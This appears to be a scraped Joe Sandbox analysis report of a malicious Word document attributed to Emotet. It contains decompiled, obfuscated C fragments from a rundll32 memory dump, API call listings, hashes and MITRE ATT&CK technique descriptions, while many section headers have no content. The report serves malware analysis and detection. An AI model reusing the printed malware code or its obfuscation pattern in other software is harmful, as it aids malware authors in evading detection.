Opcode ID: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
Instruction ID: bd140e2883c1a2fbda30cf6356113c6e4bce8f23b45be0491eca16e5ae9e7732
Opcode Fuzzy Hash: a2bec794df76323023851c9be7ee8809eaedd15e8b0fb47450a564a3f094c509
Instruction Fuzzy Hash: 3A1123B1D01318BBEB18DFA4C84A8DEBBB4FB00718F108598E825B6251D3B95B44DB80

Uniqueness

Uniqueness Score: -1.00%

Function 001BEB1E, Relevance: 1.5, APIs: 1, Instructions: 43
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E001BEB1E(void* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t34;
				int _t44;

				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001C2550(_t34);
				_v8 = 0xd1b2;
				_v8 = _v8 * 0x63;
				_v8 = _v8 << 4;
				_v8 = _v8 * 0x74;
				_v8 = _v8 ^ 0x4bec8e88;
				_v20 = 0x1fc5;
				_v20 = _v20 + 0x9c84;
				_v20 = _v20 ^ 0x0000b099;
				_v16 = 0x542c;
				_v16 = _v16 | 0x3ba7d0a3;
				_v16 = _v16 ^ 0x3ba7e6ce;
				_v12 = 0x8319;
				_v12 = _v12 * 0x45;
				_v12 = _v12 + 0xffff39a4;
				_v12 = _v12 ^ 0x0022b84c;
				E001B7378(__ecx, 0x497c0ce2, __ecx, 0x90f109b3, 0x28d);
				_t44 = DeleteFileW(_a8); // executed
				return _t44;
			}

0x001beb24
0x001beb27
0x001beb2b
0x001beb2c
0x001beb31
0x001beb49
0x001beb4c
0x001beb5b
0x001beb5e
0x001beb65
0x001beb6c
0x001beb73
0x001beb7a
0x001beb81
0x001beb88
0x001beb8f
0x001beb9a
0x001beb9d
0x001beba4
0x001bebb7
0x001bebc2
0x001bebc7

APIs

DeleteFileW.KERNELBASE(3BA7E6CE), ref: 001BEBC2

Memory Dump Source

Source File: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.2346907640.00000000001D0000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2346912012.00000000001D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
Instruction ID: 28ea2b0b6eae4a65d8ff81ca2bee10aadea49ad581bb6a619f4a1e45e3012cff
Opcode Fuzzy Hash: 5b5a61d3999058f75d5056704f6b95223429b9c5b7b3188806985cdc6256b9e5
Instruction Fuzzy Hash: D911E3B1C0020DFBDF04DFE4DA468DEBBB4FB80314F608599E815A62A1D7749B549F90

Uniqueness

Uniqueness Score: -1.00%

Function 001BF1ED, Relevance: 1.3, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E001BF1ED(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t46;
				int _t57;
				signed int _t59;
				signed int _t60;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001C2550(_t46);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x28beb0;
				_v16 = 0xe97b;
				_v16 = _v16 >> 3;
				_t59 = 0x47;
				_v16 = _v16 / _t59;
				_v16 = _v16 ^ 0x00001a39;
				_v12 = 0x2d01;
				_v12 = _v12 >> 8;
				_t60 = 0x3a;
				_v12 = _v12 / _t60;
				_v12 = _v12 ^ 0x000023d3;
				_v20 = 0xc5d9;
				_v20 = _v20 | 0x3e7a6da8;
				_v20 = _v20 ^ 0x3e7ad9f3;
				_v8 = 0x3ddd;
				_v8 = _v8 >> 7;
				_v8 = _v8 + 0xffffadd9;
				_v8 = _v8 ^ 0xffff8e91;
				E001B7378(_t60, 0x171b6692, _t60, 0x90f109b3, 0x219);
				_t57 = CloseHandle(_a12); // executed
				return _t57;
			}

0x001bf1f3
0x001bf1f6
0x001bf1f9
0x001bf1fe
0x001bf203
0x001bf20a
0x001bf213
0x001bf21a
0x001bf223
0x001bf228
0x001bf22d
0x001bf234
0x001bf23b
0x001bf242
0x001bf24a
0x001bf24d
0x001bf254
0x001bf25b
0x001bf262
0x001bf269
0x001bf270
0x001bf274
0x001bf27b
0x001bf29a
0x001bf2a5
0x001bf2aa

APIs

CloseHandle.KERNEL32(3E7AD9F3), ref: 001BF2A5

Memory Dump Source

Source File: 0000000E.00000002.2346880947.00000000001B0000.00000040.00020000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.2346907640.00000000001D0000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.2346912012.00000000001D2000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
Instruction ID: eb185419ce78b9a186e92f703c0800f1a409084fe614b6149823f69b508b4c24
Opcode Fuzzy Hash: cf10afad277e2012e22543214ce3650eca193848e4e18c4a52ea8fe530b3ff63
Instruction Fuzzy Hash: F91126B6D0020CEBDF05CFE5C80A9DEBBB5FB14308F108589E915A6290D3B59B649F80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 001D8330, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetMonitorInfoA.USER32(?,?), ref: 001D8361
GetSystemMetrics.USER32(00000000), ref: 001D839D
GetSystemMetrics.USER32(00000001), ref: 001D83A8

Strings

DISPLAY, xrefs: 001D83C9
GetMonitorInfo, xrefs: 001D8348
/}Au, xrefs: 001D839D, 001D83A8

Memory Dump Source

Source File: 0000000E.00000002.2346918389.00000000001D3000.00000020.00020000.sdmp, Offset: 001D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d3000_rundll32.jbxd

Similarity

API ID: MetricsSystem$InfoMonitor
String ID: /}Au$DISPLAY$GetMonitorInfo
API String ID: 4250584380-1428758730
Opcode ID: 204fc944b58ba99e2d5414117348939390e8ff5ac910934a0adb2df93317a575
Instruction ID: eea4e71299f5606e0cbc12da0e559e6b1add1d95d128903a1bb9d7d4f8820a9a
Opcode Fuzzy Hash: 204fc944b58ba99e2d5414117348939390e8ff5ac910934a0adb2df93317a575
Instruction Fuzzy Hash: E1118171602715AFD7209F68AC487BBB7E9FB55B10F00852AED4AD7340DBB0E845CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001D85AC, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(?,?,?,?), ref: 001D85E5
GetSystemMetrics.USER32(00000000), ref: 001D860A
GetSystemMetrics.USER32(00000001), ref: 001D8615

Strings

EnumDisplayMonitors, xrefs: 001D85C4
/}Au, xrefs: 001D860A, 001D8615

Memory Dump Source

Source File: 0000000E.00000002.2346918389.00000000001D3000.00000020.00020000.sdmp, Offset: 001D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d3000_rundll32.jbxd

Similarity

API ID: MetricsSystem$DisplayEnumMonitors
String ID: /}Au$EnumDisplayMonitors
API String ID: 1389147845-1105134141
Opcode ID: 51293db61cb129c5bda10cf868ebecfaf134edfde375a248d13e14dfec4f8738
Instruction ID: 26f254b5dea6f41ff2bd832edcc42bdf04662e646994a374947457d46f48aabd
Opcode Fuzzy Hash: 51293db61cb129c5bda10cf868ebecfaf134edfde375a248d13e14dfec4f8738
Instruction Fuzzy Hash: 8E31FDB2A01209AFDB11DBA5DC44EEFB7BCEB65314F044526F915D3241EB34E9058BA1

Uniqueness

Uniqueness Score: -1.00%

Function 001D8404, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 001D8471
GetSystemMetrics.USER32(00000001), ref: 001D847C

Strings

DISPLAY, xrefs: 001D849D
/}Au, xrefs: 001D8471, 001D847C
GetMonitorInfoA, xrefs: 001D841C

Memory Dump Source

Source File: 0000000E.00000002.2346918389.00000000001D3000.00000020.00020000.sdmp, Offset: 001D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d3000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoA
API String ID: 4116985748-2822609925
Opcode ID: c5a34600680cc53793c8db03a1f2e4e771716eac03a9bf195d6ea198599981c3
Instruction ID: e7961d6e5f01de4def7f30ebf310d50813eeec1a17457bbb8afa111aad7d5953
Opcode Fuzzy Hash: c5a34600680cc53793c8db03a1f2e4e771716eac03a9bf195d6ea198599981c3
Instruction Fuzzy Hash: C111EF716013069FD720DF64EC48BEBB7E8EF15724F01892AED599B340DFB0A8448BA1

Uniqueness

Uniqueness Score: -1.00%

Function 001D84D8, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 001D8545
GetSystemMetrics.USER32(00000001), ref: 001D8550

Strings

/}Au, xrefs: 001D8545, 001D8550
DISPLAY, xrefs: 001D8571
GetMonitorInfoW, xrefs: 001D84F0

Memory Dump Source

Source File: 0000000E.00000002.2346918389.00000000001D3000.00000020.00020000.sdmp, Offset: 001D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d3000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$DISPLAY$GetMonitorInfoW
API String ID: 4116985748-1558784340
Opcode ID: b8b7c8e9bbd0356b01894b15bcf17e7fa286c201b430af70779184f31dabea5e
Instruction ID: 56d0b53494e1662c52bcc3fc6050ba2964145b85d8f50a5cb7d9a2063a899c77
Opcode Fuzzy Hash: b8b7c8e9bbd0356b01894b15bcf17e7fa286c201b430af70779184f31dabea5e
Instruction Fuzzy Hash: 2C119D71A417059FD720DF64AC48BEBB7F8EB25710F04852BED49D7340DBB5A8448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001D8298, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 001D82E6
GetSystemMetrics.USER32(00000001), ref: 001D82F8

Strings

MonitorFromPoint, xrefs: 001D82AA
/}Au, xrefs: 001D82E6, 001D82F8

Memory Dump Source

Source File: 0000000E.00000002.2346918389.00000000001D3000.00000020.00020000.sdmp, Offset: 001D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d3000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromPoint
API String ID: 4116985748-3670600901
Opcode ID: 963bde116199a1318e33738d94e0fc3bf5ed3022b8a32dd41a85ab28b1690b71
Instruction ID: 5dafd9c2dad967fc01804869734285d419aaad9743c9b9f809420b005e97f18a
Opcode Fuzzy Hash: 963bde116199a1318e33738d94e0fc3bf5ed3022b8a32dd41a85ab28b1690b71
Instruction Fuzzy Hash: 8B014B31201328BFDB104F59EC4CB9E7BA9FB60B61F448026F9089B351CB71ED468BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001D8170, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000000), ref: 001D81C1
GetSystemMetrics.USER32(00000001), ref: 001D81CD

Strings

MonitorFromRect, xrefs: 001D8185
/}Au, xrefs: 001D81C1, 001D81CD

Memory Dump Source

Source File: 0000000E.00000002.2346918389.00000000001D3000.00000020.00020000.sdmp, Offset: 001D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d3000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$MonitorFromRect
API String ID: 4116985748-120404372
Opcode ID: e1440aead5b639bc990c8691aa7a5d1e94ec274abe80033672cd2a7a972c9b39
Instruction ID: ee5b824a20144819bcf06219e63e2d2030e620db17445270578369ab48aa0a9c
Opcode Fuzzy Hash: e1440aead5b639bc990c8691aa7a5d1e94ec274abe80033672cd2a7a972c9b39
Instruction Fuzzy Hash: AA014B322002159FD710AF19ED8DB9BB799E7603A1F15C0A3ED04DA302CB719C4A8BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00212B38, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00212B7C
DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00212BA9
DdeGetLastError.USER32(00000015), ref: 00212BBB
DdeFreeStringHandle.USER32(00000015,?), ref: 00212BCD

Memory Dump Source

Source File: 0000000E.00000002.2346918389.00000000001D3000.00000020.00020000.sdmp, Offset: 001D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d3000_rundll32.jbxd

Similarity

API ID: HandleString$ClientCreateErrorFreeLastTransaction
String ID:
API String ID: 2421758087-0
Opcode ID: 4849217664749308e10940392ab0593226cceb692c8066439c367244a30baa2d
Instruction ID: 619b6134a9386952ac4a8cb83f19548b42517fdfc4b6e018997f15f7914e1985
Opcode Fuzzy Hash: 4849217664749308e10940392ab0593226cceb692c8066439c367244a30baa2d
Instruction Fuzzy Hash: BC2106752182409FDB40DF68C8C5FAAB7E8AB59310F148195F998CF2A6DB75EC90CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00211428, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON

Download Yara Rule

APIs

DdeQueryConvInfo.USER32(?,?,00000060), ref: 002114BF

Strings

`, xrefs: 00211498
0!, xrefs: 00211607

Memory Dump Source

Source File: 0000000E.00000002.2346918389.00000000001D3000.00000020.00020000.sdmp, Offset: 001D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d3000_rundll32.jbxd

Similarity

API ID: ConvInfoQuery
String ID: 0!$`
API String ID: 701148680-2372600790
Opcode ID: 620dc0264bddeb269e6e4a36211402e7281d4bc836588533dfbc9712cb0099a1
Instruction ID: 0f29278ce0afe5f3734750ba2f74f2e7c03543ab2d0fcd27661e25a5ebbfb4ec
Opcode Fuzzy Hash: 620dc0264bddeb269e6e4a36211402e7281d4bc836588533dfbc9712cb0099a1
Instruction Fuzzy Hash: 02516376A2021A9BCB14EE5CD9855EE73FAEB68350F154020FE06D7344CA30DDB5CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001D80E8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(?), ref: 001D8110

Strings

GetSystemMetrics, xrefs: 001D80F8
/}Au, xrefs: 001D80FD, 001D810A, 001D8110

Memory Dump Source

Source File: 0000000E.00000002.2346918389.00000000001D3000.00000020.00020000.sdmp, Offset: 001D3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1d3000_rundll32.jbxd

Similarity

API ID: MetricsSystem
String ID: /}Au$GetSystemMetrics
API String ID: 4116985748-3773086709
Opcode ID: dd328c85e477f1b372ec4d6fc4677a670be93e74c0efcd0f6f0cd5bc3a8e4d98
Instruction ID: 25042b149c32ced9515857ef3ebd544cd2b67a91d9ad95e31522e625ea50be52
Opcode Fuzzy Hash: dd328c85e477f1b372ec4d6fc4677a670be93e74c0efcd0f6f0cd5bc3a8e4d98
Instruction Fuzzy Hash: A1F0B4301152415EDB544B3CED88A663646E762330F658B33E125463D5CF39884F8254

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report N00048481397007.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "N00048481397007.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Gp0t5ucwnkng7fi, Stream Size: 14586

General

VBA Code Keywords

VBA Code

VBA File Name: Ht_h_pv5qq7taeoe3a, Stream Size: 705

General

VBA Code Keywords

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre